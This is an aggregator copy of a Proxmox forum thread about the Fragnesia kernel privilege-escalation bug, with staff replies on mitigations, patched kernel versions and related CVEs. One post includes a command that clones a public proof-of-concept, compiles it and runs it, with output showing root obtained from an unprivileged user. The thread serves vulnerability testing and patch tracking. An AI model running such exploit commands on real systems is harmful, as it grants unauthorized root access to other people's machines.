惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

J
Java Code Geeks
Martin Fowler
Martin Fowler
MongoDB | Blog
MongoDB | Blog
博客园 - Franky
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Microsoft Security Blog
Microsoft Security Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
博客园_首页
腾讯CDC
D
Docker
The Cloudflare Blog
量子位
爱范儿
爱范儿
L
LangChain Blog
博客园 - 三生石上(FineUI控件)
博客园 - 司徒正美
aimingoo的专栏
aimingoo的专栏
Blog — PlanetScale
Blog — PlanetScale
Jina AI
Jina AI
Apple Machine Learning Research
Apple Machine Learning Research
Hugging Face - Blog
Hugging Face - Blog
博客园 - 聂微东
Vercel News
Vercel News
MyScale Blog
MyScale Blog

Proxmox Support Forum

[SOLVED] - Github Auth for Mirrors-Kernel Repo? [Automation] Mass migration tool for MS Win11/Server Proxmox GUI hang - not response is it possible to reject or quarantine spam based on conditions I set ? The PVENode task list in PVE9 is partially obscured due to the terminal font being too large. About 100% error reporting due to pveproxy.service hooks Kubernetes overlay networking breaks when upgrading from PVE 9.1 to PVE 9.2.3 Zentraler Speicher No space left on device Combine datastore and direct file archival to tape Kernel panic VFS: Unable to mount root fs on unknown-block (0,0) sobald ein 7.x Kernel verwendet wird. How to migrate disk of a VM from one ZFS to another Windows Server 2025 fails to boot after PVE 9.2 / Linux 7.0 Kernel upgrade Cannot Install Proxmox on T610 Poweredge with H700 PERC card sdn Config. gateway not reachable How to safely change domain/FQDN? Welche Filterquote erreicht ihr? NFS Share status unknown on 2 of 5 nodes Can't connect to PVE9 consoles [solved] Can't connect to PVE9 consoles [solved] [SOLVED] - Use secondary network for PVE commands Created cluster, one node storage gone BUG: proxmox mail gateway FROM = null bypass spam filtering Moving existing PBS from VMWare workstation to PVE cluster Does eBGP SDN fabric support external peering? Bug: PDM 1.1 not recognizing valid license status Proxmox GUI hang - not response PVE crashes unexpectedly Proxmox Backup Server 4.2 released! Advice
Fragnesia
invalid@exam · 2026-06-24 · via Proxmox Support Forum

Any info about the new Fragnesia bug? Is Proxmox kernel vulnerable?

UdoB

Distinguished Member

UdoB

Distinguished Member

In a virtual PVE, pve-no-subscription, both physical host and virtual host uptodate:

Code:

root@pnb:~# pveversion
pve-manager/9.1.11/8eac2c86f015bdda (running kernel: 7.0.2-2-pve)

In a shell of a "normal" user:

Code:

poc@pnb:~$ git clone https://github.com/v12-security/pocs.git && cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
#
# a lot of output...

# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

After that is run once it stays active until the cache is cleared. Meanwhile:

Code:

poc@pnb:~$ id
uid=1000(poc) gid=1000(poc) groups=1000(poc),100(users)
poc@pnb:~$ su -
# id
uid=0(root) gid=0(root) groups=0(root)

Last edited:

the upstream patches are still in flux, but the manual mitigations for copyfail and dirtyfrag (forbidding the affected modules) protect against the issue according to the reports so far. there will be an announcement as usual once fixed kernel packages become available.

Last edited:

patched kernels are on *-test, containing the fixes for both issues:

7.0.2-4
6.17.13-9
6.14.11-9
6.8.12-24

I assume Proxmox is not vulnerable to DirtyDecrypt aka DirtyCow (CVE-2026-31635), exploiting rxgk in rxrpc module)?
I could not find this feature (CONFIG_RXGK) enabled in any Proxmox kernel.

the feature is enabled (in the 6.17 and 7.0 kernels), but fixes are already included in recent kernel updates.

Hello, can you confirm is this CVE "CVE-2026-46333" impacted on proxmox-VE8.4.19 and kernel version is -- Linux 6.8.12-30-pve . is this kernel is impacted with this CVE ? please confirm.

Thanks,
Bhupendra

Hello, can you confirm is this CVE "CVE-2026-46333" impacted on proxmox-VE8.4.19 and kernel version is -- Linux 6.8.12-30-pve . is this kernel is impacted with this CVE ? please confirm.

Thanks,
Bhupendra